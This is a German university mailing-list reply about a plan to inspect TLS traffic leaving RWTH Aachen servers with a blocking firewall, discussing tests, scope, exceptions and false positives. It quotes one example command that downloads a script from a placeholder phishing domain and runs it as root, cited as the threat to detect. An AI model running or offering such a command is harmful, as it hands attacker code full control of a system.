Hi, Am 11.02.19 um 10:11 schrieb Hinrikus Wolf:
nachdem hier andere aus der FSMPI etwas mit der Polemik übertrieben haben, möchte ich mal versuchen konstruktiv zu sein.
danke. Wurde dann ja auch so fortgeführt.
Es geht darum, dass Anfragen von (bestimmten) Servern ins große Internet überwacht werden sollen, also z.B. das berühmte
curl http(s)://richtig-phishige-domain.tld/install.sh | sudo bash. Was natürlich auch von Malware gemacht werden kann.
Richtig. Darum geht es.
Zum Vorgehen möchte ich anmerken, dass ich das etwas geschickter gefunden hätte, wenn die erste Ankündigung von einer IT-Adminrunde passiert wäre.
Ich finde es besser, hier ein offene Diskussion mit Euch zu führen, um zu erfahren, was geht, was nicht geht, wo der Schuh drückt usw ... Die Admin-Runde kommt dann dran, wenn wir unter Berücksichtigung aller Einwände und nach ein paar Tests mit Freiwilligen ein Konzept haben, mit dem arbeiten wollen. Aber das ganze soll dieses Jahr stattfinden.
Ich würde gerne mal wissen, ob ihr das auf euren eigenen Systemen schon getestet habt. Wenn ja, mit welchem Erfolg? Malware gefunden? False Positives? Leistungseinbußen? (Hast du Zahlen?, welche System sind betroffen).
Ich habe mir als proof of concept so einen Setup für mein Laptop genauer: ein kleines Netz aufgebaut. In das Netz stecke ich schon mal den einen oder anderen Virenverseuchten Rechner, und ja, das hilft. Betriebliche Erfahrungen mit Servern haben wir noch nicht. Die Kollegen aus Clausthal haben beim umgekehrten Weg (also der externe Traffic zu HTTPS-Servern im Hochschulnetz) keine nennenswerten Einbußen bemerkt: https://www.dfn.de/fileadmin/3Beratung/Betriebstagungen/bt68/BT68_IPWIN_Intr...
Für welche Server soll das am Ende gelten? Alle? Alle, die Freigaben in der "Great Wall of Aachen" haben? Ausgewählte, die als kritisch betrachtet werden?
Zunächst mal möchte ich einen hohen Anteil der Systeme haben, die Dienste für die Welt anbieten. Das ich 100% der Systeme nicht kriege, ist mir auch klar. Eine Fragestellung für mich ist zum Beispiel, wie spezifisch könnnen Ausnahmen formulieren. Wenn die kritischen Kommunikationspartner eines Servers bekannt sind (z.B. die Bank), kann man solchen Traffic heutzutage ausnehmen.
Soll nur überwacht werden oder auch geblockt werden?
Nun, eine IPS Komponente wird blocken, wenn sie meint, hier passiert etwas schlimmes. Ja, und "false positives" gibt es. Bisher ist das aber beherrschbar. Ich denke nicht, dass der Anteil wesentlich steigt, wenn man in TLS reinschaut.
Ich denke das sind genug Fragen. Eine Anmerkung bleibt: https://jhalderm.com/pub/papers/interception-ndss17.pdf
Interessantes Paper, betrifft aber eine etwas andere Geräteklasse. Aber Tests dieser Art wären hier auch interessant, und der Hersteller der Firewallsysteme interessiert sich durchaus für Anmerkungen und Verbesserungsvorschäge seiner Kunden und setzt so etwas auch um.
Die schreiben, warum eine Aufbrechen von TLS-Traffic meistens eine Verringerung der Sicherheit bedeutet.
Wenn hier jemand solche Tests machen will, ist er herzlich willkommen. Gruß, Jens Hektor -- Dipl.-Phys. Jens Hektor, Networks IT Center, RWTH Aachen University Room 2.04, Wendlingweg 10, 52074 Aachen (Germany) Phone: +49 241 80 29206 - Fax: +49 241 80 22666 http://www.itc.rwth-aachen.de - hektor@itc.rwth-aachen.de